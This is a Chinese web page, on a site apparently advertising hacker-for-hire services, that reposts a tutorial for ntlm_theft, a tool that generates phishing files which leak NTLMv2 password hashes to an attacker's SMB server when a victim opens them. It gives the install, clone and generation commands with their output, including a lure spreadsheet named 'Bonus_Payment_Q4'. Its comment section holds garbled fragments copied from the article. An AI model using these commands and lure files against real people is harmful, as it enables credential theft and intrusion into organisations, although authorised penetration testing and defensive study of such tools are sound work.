黑客24小时在线接单的网站

黑客24小时在线接单的网站

2022年04月03日 16:40:00

如何使用ntlm_theft生成各种类型的NTLMv2哈希窃取文件

关于ntlm_theft

ntlm_theft是一款基于Python 3开发的开源工具可生成21种不同类型的哈希窃取文件。该工具适用于网络钓鱼攻击和支持外部网络SMB在流量和内部网络环境中。与基于宏的文档或使用漏洞的文档相比,这些文件类型的优点是使用所有这些文件“预期功能”构建的。

使用场景

ntlm_theft主要为渗透测试人员和红队研究人员设计,可帮助研究人员在目标公司内部网络钓鱼,或大规模测试防病毒和电子邮件网关的安全性。如果允许外部网络防火墙出站SMB也可用于外部网络钓鱼。

工具依赖

ntlm_theft基于Python 3开发,需要在当地环境中安装和配置Python 3环境,并安装好xlsxwriter:

  • pip3installxlsxwriter

    • 工具下载

    大多数研究人员可以使用以下命令将项目源代码克隆到当地:

  • gitclonehttps://github.com/Greenwolf/ntlm_theft.git

    • 工具参数

    ntlm_theft运行需要四个必要的参数,一个输入格式,输入文件或目录,以及基本的运行模式:

                     
    • -g,--generate
      •                
    • -s,--server : SMB哈希捕捉服务器IP地址
      •                
    • -f,--filename : 不包括后缀的基本文件名,然后可以重命名

    工具运行

    我们将给出的工具示例中,我们将使用它ntlm_theft生成所有文件:

  • #python3ntlm_theft.py-gall-s127.0.0.1-ftest
  • Created:test/test.scf(BROWSE)
  • Created:test/test-(url).url(BROWSE)
  • Created:test/test-(icon).url(BROWSE)
  • Created:test/test.rtf(OPEN)
  • Created:test/test-(stylesheet).xml(OPEN)
  • Created:test/test-(fulldocx).xml(OPEN)
  • Created:test/test.htm(OPENFROMDESKTOPWITHCHROME,IEOREDGE)
  • Created:test/test-(includepicture).docx(OPEN)
  • Created:test/test-(remotetempl*ate).docx(OPEN)
  • Created:test/test-(frameset).docx(OPEN)
  • Created:test/test.m3u(OPENINWINDOWSMEDIAPL*AYERONLY)
  • Created:test/test.asx(OPEN)
  • Created:test/test.jnlp(OPEN)
  • Created:test/test.application(DOWNLOADANDOPEN)
  • Created:test/test.pdf(OPENANDALLOW)
  • Created:test/zoom-attack-instructions.txt(PASTETOCHAT)
  • GenerationComplete.

    • 在下面的工具使用样例中,我们将使用ntlm_theft只生成现代文件:

  • #python3ntlm_theft.py-gmodern-s127.0.0.1-fmeeting
  • SkippingSCFasitdoesnotworkonmodernWindows
  • Created:meeting/meeting-(url).url(BROWSETOFOLDER)
  • Created:meeting/meeting-(icon).url(BROWSETOFOLDER)
  • Created:meeting/meeting.rtf(OPEN)
  • Created:meeting/meeting-(stylesheet).xml(OPEN)
  • Created:meeting/meeting-(fulldocx).xml(OPEN)
  • Created:meeting/meeting.htm(OPENFROMDESKTOPWITHCHROME,IEOREDGE)
  • Created:meeting/meeting-(includepicture).docx(OPEN)
  • Created:meeting/meeting-(remotetempl*ate).docx(OPEN)
  • Created:meeting/meeting-(frameset).docx(OPEN)
  • Created:meeting/meeting-(externalcell).xlsx(OPEN)
  • Created:meeting/meeting.m3u(OPENINWINDOWSMEDIAPL*AYERONLY)
  • Created:meeting/meeting.asx(OPEN)
  • Created:meeting/meeting.jnlp(OPEN)
  • Created:meeting/meeting.application(DOWNLOADANDOPEN)
  • Created:meeting/meeting.pdf(OPENANDALLOW)
  • Skippingzoomasitdoesnotworkonthelatestversions
  • SkippingAutorun.infasitdoesnotworkonmodernWindows
  • Skippingdesktop.iniasitdoesnotworkonmodernWindows
  • GenerationComplete.

    • 以下工具我们将使用样本ntlm_theft仅生成一份xlsx文件:

  • #python3ntlm_theft.py-gxlsx-s192.168.1.103-fBonus_Payment_Q4
  • Created:Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx(OPEN)
  • GenerationComplete.

    • 工具运行截图

    项目地址

    ntlm_theft:【GitHub传送门】

       

    标签:网络钓鱼 漏洞 安全工具 

    作者:访客 , 分类:勒索病毒 , 浏览:1219 , 评论:4

    • 评论列表:
    •  余安千夜
       发布于 2022-06-02 17:28:52  回复该评论
    • (BROWSETOFOLDER)Created:meeting/meeting-(icon).url(BROWSETOFOLDER)Created:meeting/meeti
    •  边侣鸢旧
       发布于 2022-06-02 20:45:23  回复该评论
    • )Created:test/test.application(DOWNLOADANDOPEN)Created:test/test.pdf(OPENANDALLOW)Created:test/zoom-attack
    •  泪灼眼戏
       发布于 2022-06-02 16:25:23  回复该评论
    •      -g,--generate                -s,--server : SMB哈希捕捉服务器IP地址                -f,--filename : 不包括后缀的基本文件名,然后可以重命名工具运行
    •  莣萳愚季
       发布于 2022-06-02 23:14:42  回复该评论
    • 关于ntlm_theftntlm_theft是一款基于Python 3开发的开源工具可生成21种不同类型的哈希窃取文件。该工具适用于网络钓鱼攻击和支持外部网络SMB在流量和内部网络环境中。与基于宏的文档或使用漏

    发表评论:

    Powered By

    Copyright Your WebSite.Some Rights Reserved.